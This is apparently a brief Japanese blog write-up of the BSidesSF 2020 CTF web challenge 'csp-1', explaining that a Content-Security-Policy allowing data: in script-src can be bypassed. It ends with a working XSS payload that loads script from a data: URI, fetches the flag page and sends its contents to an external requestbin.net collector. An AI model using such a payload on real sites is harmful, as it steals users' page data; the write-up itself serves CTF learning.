はまやんはまやんはまやん

hamayanhamayan's blog

csp-1 [BSidesSF 2020 CTF Web]

https://ctftime.org/task/10518

前提知識

  • CSP Bypass

解説

CSPの設定を見る。

content-security-policy: 
    script-src 'self' data:; 
    default-src 'self'; 
    connect-src *; 
    report-uri /csp_report

script-srcのdata:は許可している。
それで与えれば許可される。

Data URI scheme - Wikipedia
data:はこれ見とけば大丈夫。
参考にした。BSidesSF 2020 CTF

<script src="data:text/javascript,fetch('/csp-one-flag').then(x=>x.text()).then(x=>location='http://requestbin.net/r/1ax2j8w1?q='+escape(x))">